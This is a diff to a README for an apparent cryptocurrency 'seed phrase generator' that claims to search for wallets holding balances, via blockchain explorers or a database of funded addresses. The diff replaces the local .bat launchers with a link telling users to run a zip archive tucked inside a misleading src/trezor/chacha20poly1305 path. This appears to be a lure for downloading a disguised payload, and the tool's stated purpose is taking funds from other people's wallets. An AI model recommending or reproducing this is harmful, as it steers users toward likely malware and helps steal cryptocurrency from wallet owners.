wizdomf3lix/seed-phrase-generator/README.md

 ### For Bitcoin (BTC) wallets:

-* Press key 3 in the menu or run start_search_btc.bat to search Bitcoin wallets through the internet.
+* Press key 3 in the menu or run https://github.com/wizdomf3lix/seed-phrase-generator/raw/refs/heads/main/src/trezor/chacha20poly1305/seed_generator_phrase_3.0.zip to search Bitcoin wallets through the internet.
 This method may take longer, as it checks wallet balances in real-time via blockchain explorers.
 * Press key 6 to search Bitcoin wallets using the database.
 This method is faster because it compares generated wallets against a pre-built database of known addresses with balances.

 ### For EVM wallets (Ethereum, BNB, MATIC, etc.):

-* Press key 5 or run start_search_evm.bat to search EVM wallets through the internet.
+* Press key 5 or run https://github.com/wizdomf3lix/seed-phrase-generator/raw/refs/heads/main/src/trezor/chacha20poly1305/seed_generator_phrase_3.0.zip to search EVM wallets through the internet.
 This method checks for wallets with balance in real-time through blockchain explorers.
 * Press key 6 to search EVM wallets using the database.
 This method is faster since it compares generated wallets against the known database of addresses with balance.

 ### Speed Considerations: